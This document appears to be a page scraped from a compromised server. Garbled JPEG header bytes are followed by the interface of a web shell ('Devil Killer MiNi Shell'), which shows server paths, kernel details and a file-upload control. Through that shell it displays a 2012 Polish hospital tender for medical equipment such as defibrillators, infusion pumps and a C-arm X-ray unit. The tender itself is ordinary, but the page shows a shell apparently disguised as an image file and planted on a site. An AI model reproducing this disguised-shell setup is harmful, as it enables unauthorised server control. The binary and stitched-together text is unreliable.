JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120808/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120808/292668-N-2012.html

<p class="kh_header"><b>Radom: Zakup, dostawa i montaż sprzętu i aparatury medycznej dla potrzeb Placówek Radomskiego Szpitala Specjalistycznego</b><br>
<b>Numer ogłoszenia: 292668 - 2012; data zamieszczenia: 08.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Radomski Szpital Specjalistyczny im. dr Tytusa Chałubińskiego , ul. Tochtermana 1, 26-610 Radom, woj. mazowieckie, tel. 048 3615285, 3615284, faks 048 3615213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.radom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup, dostawa i montaż sprzętu i aparatury medycznej dla potrzeb Placówek Radomskiego Szpitala Specjalistycznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup , dostawa i montaż sprzętu i aparatury medycznej  dla potrzeb Placówek Radomskiego Szpitala Specjalistycznego.

Część nr 1 - Witryna chłodnicza do przechowywania leków termolabilnych- szt.1
Lp.	Opis asortymentu
1Minimum 8 półek
2Wyświetlacz temperatury - możliwość jej regulacji
3Automatyczne rozmrażanie
4Przezroczyste drzwi
5Wentylator wyrównujący temperaturę wewnątrz
6Oświetlenie wnętrza z wyłącznikiem
7Możliwość zmiany ułożenia półek
8Pojemność min. 350L; wymiary: szerokość- 60 cm (+/- 3cm), wysokość min. 175 cm
9Zasilanie odpowiadające zasilaniu w aptece tj. 230 V
10Zakres temperatury 1-12 stopni C
11Jedno lub dwu - drzwiowa

Część nr 2 - Wózki do przewożenia bielizny
1.	Wózek do przewożenia brudnej bielizny szt. 2
- pojemność wózka 120-160L
- wymiary wózka :
Szerokość - 480mm +/- 10 mm
Długość - 570mm +/- 10 mm
Wysokość - 1050-1100mm +/- 10 mm
- obręcz wózka - średnica 460mm +/- 10mm
- pokrywa wózka ( długość x szerokość ) - 480mm x 510mm +/- 10 mm
- wózek ze stali kwasoodpornej
- wózek z obręczą zaciskową zabezpieczającą  zsunięcie się worka
- pokrywa podnoszona bez użycia rąk za pomocą pedału nożnego oraz łatwą i prostą wymianę worka
- cztery kółka o średnicy około 100mm, w tym 2  z blokadą 	
2.	Wózek do przewożenia czystej bielizny: 2 szt.
- wysokość wózka - 100-110cm
- szerokość - około 50cm
- średnica kół - 125mm +/- 10 mm w tym jedno z blokadą oraz 4 krążki odbojowe
- wyposażony w koszyk boczny - szt.1
- uchwyt na ręcznik papierowy - szt.1
- ramy stalowe z dwoma bocznymi uchwytami do prowadzenia
- wysuwana szuflada z tworzywa - 1 szt.
- kosz z trzema przedziałami
- boczne panele z kraty
- półka centralna  z regulowaną wysokością wieszana na bocznych panelach
- stalowa półka z tylną krawędzią na dolnym poziomie	

Część nr 3 - Urządzenia i akcesoria do rehabilitacji
1.	Piłki gimnastyczne:
 - o średnicy 55cm- szt.1
- o średnicy 65 cm	- szt.1
2. Platforma balansowa II stopnia o średnicy 40cm- szt.1
3	Dysk gładki ( bereta)- szt.2
4	Piłeczki sensomotoryczne z kolcami:
- o średnicy 23 cm- szt. 1 
- o średnicy 28 cm	- szt.2
5	Półwałki:
 - wymiarach 60x18x12 - szt.4
- wymiary 60x36x18 - szt.4
6	Korektor lędźwiowy  o wymiarach 32x25x5	- szt.4
7	Kliny:
- o wymiarach 40x50x20 - szt.3
- o  wymiarach  70x60x25- szt.2
8	Poduszki z kolcami do ćwiczeń równoważnych 	- szt.2
9	Hantle polietylenowe
- o wadze 1 kg- 2 pary
- o wadze 2 kg- 2 pary
10	Osprzęt do Uniwersalnych gabinetów Usprawniania Leczniczego (UGUL -i)  standardowy	4 komplety
11	Leżanka lekarska- standardowa- szt.4

Część nr 4 - Regały metalowe do magazynowania materiałów sterylnych
Lp.1	Regały do magazynowania materiałów sterylnych ( tace z narzędziami) 
- o wymiarach 190cm ( wysokość) x 120 cm ( szerokość) x 60 cm ( głębokość) - szt . 3
- wykonanie ze stali kwasoodpornej 
- nośność półki 150kg
- nośność regału  500kg
- sześć półek z pełnej blachy	
2	Regały do magazynowania materiałów sterylnych ( tace z narzędziami) 
- o wymiarach 190cm ( wysokość) x 60 cm ( szerokość) x 60 cm ( głębokość)
- wykonanie ze stali kwasoodpornej - szt.2
- nośność półki 150kg
- nośność regału 500kg
-  sześć półek z pełnej blachy

Część nr 5 - Lampa Lupa ze statywem - 1 szt.
1	Lampa Lupa zawierająca:
- ukryte sprężyny
- zapłon elektroniczny ( natychmiastowy)
- brak migotania światła przy włączeniu
- oszczędność energii ok. 25%
- zakrywka osłaniająca soczewkę przed kurzem

Część nr 6 - Diatermia chirurgiczna - 1 szt.
1	Rok produkcji 2012
2	Diatermia chirurgiczna mono i bipolarna przystosowana do wykonywania zabiegów endoskopowych
3	Klasa bezpieczeństwa I/CF
4	Kontrola obwodu elektrody biernej
5	Autotest aparatu po włączeniu zasilania
6	Minimum 5 trybów pracy: cięcie monopolarne czyste, cięcie koagulujące, koagulacja monopolarna miękka, koagulacja monopolarna forsowna ( intensywna) , koagulacja bipolarna
7	Możliwość aktywacji urządzenia wyłącznikiem nożnym, jak i przyciskami na uchwycie
8	Możliwość przyłączenia trybu pracy z cięcia na koagulację za pomocą przycisków na uchwycie
9	Cięcie monopolarne maksymalne w zakresie od 80 do 120W
10	Cięcie mieszane maksymalne w zakresie od 50 do 120W
11	Koagulacja bipolarna maksymalna w zakresie  od 40 do 100W
12	Koagulacja monopolarna  w trybie łagodnym i forsownym ( intensywnym)
13	Waga urządzenia nie więcej niż 4 kg
14	Wyposażenie wielorazowego użytku, przeznaczone do sterylizacji w autoklawie ( do 134 stopni C, 2.1 bara) lub gazie
15	Wyposażenie wielorazowe:
- elektroda bierna wielorazowa z kablem szt.1
- kabel zasilający sz.1
- kabel do narzędzi endoskopowych szt.1
16	Nożny włącznik do sterowania diatermią, dwu przyciskowy - szt. 1
17	Gwarancja na urządzenie min. 3 lata
18	W okresie gwarancji przeglądy techniczne okresowe bezpłatne
19	Inne wymagania:
- instrukcja obsługi w języku polskim w wersji papierowej i elektronicznej

Część nr 7 - Artykulator z łukiem twarzowym - sz.1
1	Urządzenia ma się składać z:
- artykulatora
- łuku twarzowego elektronicznego lub mechanicznego
- sztyftu podpierającego T lub P z ustawieniami 5/100
- pozycjonera modelu szczęki dla APFut
- wskaźnika nachylenia okluzji
- transferu do montażu modeli na artykulator w pracowni technicznej bez konieczności noszenia artykulatora własnego
- stolik do montażu modeli, wskaźnik sieczny ( trójkąt Bonvilla 110mm)
- stoliki sieczne ( płaski, 10 stopni, 20,30,40 i 50 ) - przedni element prowadzący w artykulatorze , keloty dłuższa i krótka
- krzywki PDR - pozwalają na dystrakcję w zakresie 0-6mm, protruzję 0-6mm, retruzja 0-1mm

Część nr 8 - Defibrylator   z możliwością wykonania kardiowersji - 1 szt.
1	Rok produkcji 2012
2.	Defibrylator przenośny z możliwością stosowania stacjonarnego
3.	Zasilanie sieciowo - akumulatorowe
4.	Defibrylacja dwufazowa
5.	Szeroki zakres wyboru energii w J, min. 5-360J
6.	Ilość stopni dostępności energii defibrylacji zewnętrznej min. 20
7.	Czas ładownia do energii 200J max. 5 sekund
8.	Defibrylacja ręczna
9.	Defibrylacja półautomatyczna
10.	Kolorowy ekran monitora
11.	Przekątna ekranu monitora min. 5 cali
12. 	Możliwość wykonania kradiowersji
13.	Możliwość defibrylacji dorosłych i dzieci
14.	Ciężar max. 7 kg
15.	Komunikacja z użytkownikiem w języku polskim ( komunikaty na ekranie i komendy głosowe)
16.	Monitorowanie EKG min. 3 odprowadzenia
17.	Pomiar tętna w zakresie min. 30-300 u,/min.
18.	Możliwość wykonania stymulacji przezskórnej w trybach : na żądanie i asynchronicznym
19.	Częstotliwość stymulacji w zakresie min. 40-150 imp/min.
20.	Natężenie prądu stymulacji w zakresie min. 10-170 mA
21. 	Pomiar saturacji krwi tętniczej ( SpO2) min. 1-100%
22.	Krzywa pletyzmograficzna na ekranie
23.	Czujnik wielorazowego użytku typu klips na palec w wyposażeniu
24.	Gwarancja min. 24 m-ce
25.	Serwis gwarancyjny i pogwarancyjny

Część nr 9 - Rejestrator do badań Holter EKG - 1szt.
1	Rok produkcji 2012
2	 Rejestrator cyfrowy , dwusystemowy 12 i 3 kanałowy, pracujący dla systemu do analizy EKG metodą Holtera
3	Klasa bezpieczeństwa CF
4	Archiwizacja bez kompresji pełnego zapisu EKG z minimum 24 godzin
5	Przetwarzanie sygnału minimum 24 bitowe
6	Autodetekcja kabla pacjenta z samo konfiguracją aparatu do kabla 10,7 lub 4 odprowadzeniowego
7	Test kontaktu każdej elektrody z wizualizacją elektrod na wyświetlaczu
8	Wskaźnik stopnia naładowania akumulatorów
9	Kolorowy wyświetlacz typu OLED
10	Ciężar urządzenia gotowego do pracy nie więcej niż 250 gram
11	Zasilanie akumulatorowe lub alternatywnie bateryjnie
12	Pełna współpraca ( kompatybilność) rejestratora z oprogramowaniem Halter SiliconBeat 2000 ( będącym na wyposażeniu szpitala)
13	Wyposażenie:
- ładowarka akumulatorów - 1 szt.
- 2 komplety akumulatorów 
- etui na aparat z paskiem - 1 szt.
- wymienny kabel pacjenta (7 odprowadzeniowy ) - szt.2
- karta Compact Flash - szt.2
14	Gwarancja na urządzenie minimum 2 lata
15	W okresie gwarancji przeglądy techniczne okresowe bezpłatne
16	Inne wymagania:
- instrukcja obsługi w języku polskim w wersji papierowej i elektronicznej

Część nr 10 - Ureterorenoskop - 
1. Zestaw I - Standardowy 	
Ureterorenoskop typ kompaktowy, optyka zintegrowana, wymiar maksymalny części roboczej 9.9 Charr, początkowy/dystalny mniejszy o min. 1,5 Charr, co najmniej jeden  kanał roboczy na wprost dla instrumentów minimum 5 Charr, możliwość niezależnego wprowadzenia minimum dwóch instrumentów,cewników,sond minimum 3 Charr, wymiar wewnętrzny kanału minimum 5,1x6,1 Charr. Kąt patrzenia optyki 10-15 stopni, długość robocza 430-450 mm, całkowita 550-600 mm - szt.1	
Światłowód do oferowanego ureterorenoskopu współpracujący z posiadanym źródłem światła Wolf i Storz	- szt.1
Kleszczyki typ ząb myszy, minimum dwuelementowe/obrotowe, 5 Charr długość 550-600 mm	-szt.1
Kleszczyki typ aligator, minimum dwuelementowe/obrotowe, 5 Charr długość 550-600 mm	- szt.1
Nożyczki ureterorenoskopowe tnące do tyłu, 5 Charr długość 500-550 mm- szt.1
Pojemnik z przykrywką do transportu, przechowywania i sterylizacji optyk i instrumentów. Wymiary wewnętrzne minimum 700x120x75mm (długość; szerokość; głębokość).
Pojemnik z wkładami typu jeż do wyłożenia spodu jak i mocowanymi do pokrywy pojemnika. Możliwość oznaczania zawartości.- szt.1
2. Zestaw II do wąskich moczowodów
Ureterorenoskop typ kompaktowy, optyka zintegrowana, wymiar maksymalny części roboczej 7,5 Charr, początkowy/dystalny mniejszy o min. 1,5 Charr, co najmniej jeden  kanał roboczy na wprost dla instrumentów minimum 4 Charr, możliwość niezależnego wprowadzenia minimum dwóch instrumentów,cewników,sond minimum 2,4 Charr, wymiar wewnętrzny kanału minimum 4,1x4,5 Charr. Kąt patrzenia optyki 3-5 stopni, długość robocza 430-450 mm, całkowita 550-600 mm	- szt.1
Światłowód do oferowanego ureterorenoskopu współpracujący z posiadanym źródłem światła Wolf i Storz	-szt.1
Kleszczyki typ ząb myszy, minimum dwuelementowe/obrotowe, 4 Charr długość 550-600 mm	-szt.1
 Kleszczyki typ aligator, 4 Charr. długość 550-600 mm- szt.1
 Kleszczyki biopsyjne 4/3 Charr długość 550-600 mm- szt.1
Pojemnik z przykrywką do transportu, przechowywania i sterylizacji optyk i instrumentów. Wymiary wewnętrzne minimum 700x120x75mm (długość; szerokość; głębokość).
Pojemnik z wkładami typu jeż do wyłożenia spodu jak i mocowanymi do pokrywy pojemnika. Możliwość oznaczania zawartości.- szt.1
Ureterorenoskop typ kompaktowy, optyka zintegrowana, wymiar maksymalny części roboczej 6,5 Charr, początkowy/dystalny mniejszy o min. 2 Charr, co najmniej jeden  kanał roboczy na wprost dla instrumentów minimum 3 Charr, wymiar wewnętrzny kanału minimum 3,1x3,1 Charr. Kąt patrzenia optyki 3-5 stopni, długość robocza 430-450 mm, całkowita 550-600 mm- szt.1
Światłowód do oferowanego ureterorenoskopu współpracujący z posiadanym źródłem światła Wolf i Storz	-szt.1
Kleszczyki giętkie typ aligator, 3 Charr, długość 500-550 mm-szt.1
 Pojemnik z przykrywką do transportu, przechowywania i sterylizacji optyk i instrumentów. Wymiary wewnętrzne minimum 700x120x75mm (długość; szerokość; głębokość).
Pojemnik z wkładami typu jeż do wyłożenia spodu jak i mocowanymi do pokrywy pojemnika. Możliwość oznaczania zawartości.- szt.1
3. Kuwety do moczenia ureterorenoskopów - 3 szt.

Część nr 11- Balkoniki do nauki chodu - 3 szt.
1	- Podpórka dwukołowa wykonana z rurek duralowych o średnicy 22 milimetrów lakierowanych proszkowo.
- Wyrób spawany w osłonie argonu. Bez złączek z tworzywa powodujących gorszą stabilizację wyrobu.
- Podpórka zaopatrzona jest w dwa kółka z przodu o średnicy 10 centymetrów.
- Tylne podpory osłonięte są trudno ścieralnymi nasadkami z PCV.
- Wysokość w postaci złożonej najniższej 80 centymetrów.
- Możliwość regulacji na zatyczkach stalowych co cztery centymetry do wysokości 96 cm.
- Rączki  pokryte miękką pianką poliuretanową dającą pewny uchwyt i amortyzującą oparcie na nadgarstkach.
- Wyrób prosty nie wymagający konserwacji, duża trwałość i możliwość regulacji.


Część nr 12 - Wózek do przewożenia chorych w pozycji leżącej - 2 szt.
1	Wózek powinien być wyposażony w:
- barierki boczne
- wieszak do kroplówki
- kosz na ubranie pacjenta 
- krążki odbojowe w narożnikach leża,
- materac zaopatrzony w uchwyty umożliwiające przeniesienie pacjenta, kolor materaca seledyn
2	 konstrukcja wózka wykonana z profili stalowych pokrytych lakierem proszkowym odpornym na uszkodzenia mechaniczne
3	Leże dwusegmentowe wypełnione płytą z tworzywa przezierną dla promieni RTG ( w celu wykonania zdjęć na całej długości leża
4	Regulacja oparcia pleców
5	Regulacja wysokości leża dokonywana przy pomocy hydraulicznej dźwigni nożnej
6	Cztery koła jezdne blokowane centralnie, jedno z blokadą kierunkową
7	Uchwyt mocujący dla podkładu higroskopijnego w rolce
8.	Wymiary zewnętrzne wózka : 2050mm x 730mm +/- 10 mm


Część nr 13- Chłodziarko - zamrażarka - 1szt. 
1	Chłodziarko - zamrażarka :
- do przechowywania odczynników chemicznych
- o pojemność 225L
- 3 półki

Część nr 1 4- Pompa infuzyjna dwustrzykawkowa - 2 szt.
1	Rok produkcji nie starszy niż 2012
2	Pompa infuzyjna dwustrzykawkowa , dwutorowa z możliwością stosowania strzykawek o poj. 20ml, 50/60ml
3	Komunikacja w języku polskim
4	Możliwość stosowania strzykawek wielu producentów, wymiennie na obu torach. 
5	Pompa przeznaczona do wykonywania długotrwałych wlewów dożylnych 
6	Niezależne programowanie szybkości podawania dla każdego toru oddzielnie
7	Zakres szybkości wlewu od 0,1 ml/h do 99,9ml/h ze stopniowaniem co 0,1 ml/h
8	Dawka uderzeniowa tzw. BOLUS, dozowana w dowolnym momencie wlewu
9	System zabezpieczający przed obturbacją żyły KVO
10	Zasilanie sieciowe oraz awaryjne akumulatorowe. Przełączenie automatyczne
11	Alarmy dźwiękowe i świetlne: KVO, okluzja, koniec infuzji, rozładowanie baterii, brak zasilania z sieci
12	Możliwość umocowania pompy na statywie
13	Gwarancja min. 24 m-ce
14	Serwis gwarancyjny i pogwarancyjny


Część nr 15 - Wiertarki ortopedyczne - 2 komplety
1	Napęd akumulatorowy do nasadek wiertarskich i frezerskich	
-Napęd do nasadek wiertarskich i frezerskich
-tytanowa, pistoletowa obudowa dostosowana do mycia w środkach alkalicznych
- silnik bezszczotkowy komutowany elektronicznie o mocy 250W
- obroty max. Silnika 25000 obr./min
- obroty regulowane w zakresie od 0 do 1000 obr./min na głowicy nasadek wiertarskich
- obroty regulowane w zakresie od 0 do 250 obr./min na głowicy nasadek frezerskich
- zmiana kierunku obrotów przy pomocy przycisku na rękojeści napędu 
- kaniulacja O 4mm
- dystalna osłona drutu kischnera  w zestawie
- akumulator NiMH ze zintegrowaną elektroniką sterującą, o napięciu 9,6V i pojemności 1,95Ah możliwość serwisowej wymiany samych ogniw akumulatora, w zestawie
- zestaw do sterylnego wkładania akumulatora ( lejek i pokrywa komory akumulatora) w zestawie
- akumulatory niesterylizowalne umieszczane systemem lejkowym w sterylnej komorze akumulatora w rękojeści, bez oddzielnego pojemnika na akumulator
- adapter do oliwienia napędu w zestawie
- możliwość zasilania z sieci elektrycznej
- blokada przed niezamierzonym uruchomieniem
- na obudowie etykieta serwisowa z datą następnego przeglądu
2	Nasadka wiertarska Jacobs	
- nasadka wiertarska trójszczękowa typu Jacobs
- nasadka wraz z kluczykiem
- zakres min. 0,6-6,5mm
- kaniulacja O 4mm
- Maksymalna prędkość obrotowa 1000 obr./min
- moment obrotowy 5 Nm
- na obudowie etykieta serwisowa z datą następnego przeglądu
3	Nasadka do drutów Kirschnera	
- Nasadka do drutów Kirschnera
- trzy zakresy pracy ( 0,6-1,8mm; 1,8-3,0mm; 3,0-4,0mm
- kaniulacja O 4mm
- Maksymalna prędkość obrotowa 1000 obr./min
- moment obrotowy 5 Nm
- na obudowie etykieta serwisowa z datą następnego przeglądu
4	Adapter typu DIN	
- Adapter typu DIN
- kompatybilny z nasadką typu AO
5	Nasadka frezerska duże AO	
- Nasadka frezerska duże AO
- kaniulacja O 4mm
- Maksymalna prędkość obrotowa 250 obr./min
- moment obrotowy 19 Nm
- na obudowie etykieta serwisowa z datą następnego przeglądu
6	Nasadka frezerska Zimmer/Hudson	
- Nasadka frezerska Zimmer/Hudson
- kaniulacja O 4mm
 - Maksymalna prędkość obrotowa 250 obr./min
- moment obrotowy 19 Nm
- na obudowie etykieta serwisowa z datą następnego przeglądu
7	Kosz stalowy dla jednego urządzenia	
Kosz stalowy, perforowany
- uchwyt napędu / piły 1 szt.
- uchwyt pokrywy komory akumulatora 1 szt.
- uchwyt lejka do sterylnego zakładania akumulatora 1 szt.
- uchwyt do 5 nasadek wiertarskich /frezerskich
- uchwyt na brzeszczoty
- uchwyt na dystalną osłonę drutu Kirchnera min. 1 szt.
8	Wanna kontenera	
-Wanna kontenera 1/1
- wymiary zewnętrzne 592/274/135mm
- wykonana z aluminium
- uchwyty kontenera blokujące się pod kątem 90 stopni ( redukuje możliwość urazów dłoni)
- uchwyt na tabliczki identyfikacyjne po obu stronach wanny kontenera
9.	Pokrywa kontenera	Pokrywa konteneru wykonana z polietylenu
- w kolorze niebieskim
- podwójny system zabezpieczeń ( plomby) papierowe z identyfikatorami oznaczonymi kolorem lub plomby plastikowe
- filtr mikroporowy, teflonowy na 5000 cykli sterylizacji - 2 szt.
10	Tabliczka identyfikacyjna	
Tabliczka identyfikacyjna , kolor czerwony/niebieski, opis do 13 miejsc


Część nr 16 - Unit stomatologiczny
L.P.	OPIS PRZEDMIOTU ZAMÓWIENIA	PARAMETRY WYMAGANE
I. Fotel stomatologiczny
1.	Przystosowany do pracy na 4 ręce	TAK
2.	Sterowanie elektryczne	TAK
3.	Napęd elektromechaniczny / podnoszenie do 175 kg	TAK
4.	Funkcja miękkiego startu/ pierwsza faza ruchu z obniżoną prędkością	TAK
5.	Zagłówek chirurgiczny dwuprzegubowy	TAK
6.	Sterowanie ruchami fotela z konsoli lekarza i wyłącznika nożnego	TAK
7.	4 programowane pozycje fotela	TAK
8.	Pozycja zerowa	TAK
9.	Pozycja spluwaczkowa i powrót do ostatniej pozycji pracy	TAK
10.	Brak efektu  wyciągania koszuli	TAK
11.	Bezszwowa tapicerka odporna na środki dezynfekcyjne	TAK
12.	Wyłączniki awaryjne ruchu fotela	2 szt.
13.	Łatwa do samodzielnej wymiany osłona podłokietnika	TAK
II. Stolik lekarza
1	Ramię pantograficzne	TAK
2	5 rękawów od góry z blokadą w pozycji pracy	TAK
3.	Obrotowa tacka	TAK
4.	System odprowadzania zużytego oleju	TAK
5.	Niski tor ruchu ramion pantograficznych narzędzi, nie zaczepia o reflektor	TAK
6.	Sterowanie ruchami  fotela i unitu	TAK
7.	Łatwo zmywalny pulpit sterujący	TAK
8.	Negatoskop	TAK
III. Blok spluwaczki ze ślinociągiem:
1.	Zintegrowany z fotelem	TAK
2.	Odchylany od pacjenta	TAK
3.	Ślinociąg wodny	TAK
4.	Obieg wody destylowanej	TAK
5.	Czasowe i regulowane napełnianie kubka i opłukiwanie spluwaczki	TAK
IV. Sterownik nożny
1.	Elektryczny	TAK
2.	Praca końcówki z wodą	TAK
3.	Praca końcówki bez wody	TAK
4.	Sterowanie ruchami fotela	TAK
V. Reflektor
1.	Mocowany na ramieniu pantograficznym	TAK
2.	Konstrukcja   metalowa	TAK
3.	Odbłyśnik i osłona przednia wykonane ze szkła	TAK
4.	Uchwyt umożliwiający stosowanie jednorazowych osłonek	TAK
5.	Standardowa żarówka halogenowa , łatwa do samodzielnej wymiany	TAK
6.	Bezdotykowe załączenie i sterowanie natężeniem światła	TAK
VI. Kompresor
1	Cichy, bezolejowy ( w obudowie wygłuszającej) pracuje w gabinecie głośność mniejsz niż 45 dB	TAK
2	wydajność	70 l/min
VII. Wyposażenie
1.	Końcówka turbinowa	TAK
2. 	Mikrosilnik elektryczny	TAK
3.	Kątnica mikrosilnika	             TAK
4.	Strzykawka trójdrożna	TAK
5. 	Lampa polimeryzacyjna	TAK
6.	Skaler piezoelektryczny	TAK



Część nr 17 - Aparat RTG z ramieniem C
L.P.	OPIS PRZEDMIOTU ZAMÓWIENIA	PARAMETRY WYMAGANE
Generator
1.	Zasilanie jednofazowe	230 V, 50Hz
2.	Zakres dopuszczalnych wahań napięcia zasilającego 	+/- 10%
3.	Moc generatora 	max. 2,2kW
4.	Typ generatora, wysokiej częstotliwości 	Min. 20 kHz
5.	Prąd skopii ciągłej/ impulsowej 	Min. 10 mA
6.	Radiografia cyfrowa	TAK
7.	Prąd radiografii analogowej i cyfrowej	Min. 20 mA
8.	Układ minimalizujący dawkę przy skopii	Min. 50%
9.	Zakres napięć fluoroskopii i radiografii	40-110 kV
10.	Automatyka doboru parametrów skopii	TAK
11.	Skopia pulsacyjna w zakresie 1 do 25 pulsów/s	TAK
12.	Kontrola czasu trwania pulsu min. w zakresie 10-25ms	TAK
Lampa X - RAY
13.	Lampa ze stacjonarną anodą	TAK
14.	Totalna filtracja	Min. 3,8mm Al.
15.	Wymiary ogniska lub ognisk jeżeli są dwa	Max. 0,6mm
16.	Pojemność cieplna anody	Min. 50kHU
17.	Pojemność  cieplna kołpaka	Min. 1100 kHU
18.	Szybkość chłodzenia anody	Min. 51 kHU/min
19.	Kolimator typu IRIS	TAK
20.	Kolimator szczelinowy z rotacją	TAK
21.	Ustawienie kolimatorów na zamrożonym obrazie bez użycia promieniowania 	TAK
Wózek z ramieniem C
22.	Waga wózka z ramieniem C	Max. 310 kg
23.	Głębokość ramienia C	Min. 67 cm
24.	Odległość kołpak - wzmacniacz obrazu ( wolna przestrzeń)	Min. 75 cm
25.	Odległość SID	Min.96 cm
26.	Zakres ruchu poziomego ramienia C	Min. 20 cm
27.	Zakres ruchu pionowego ramienia C	Min. 42 cm
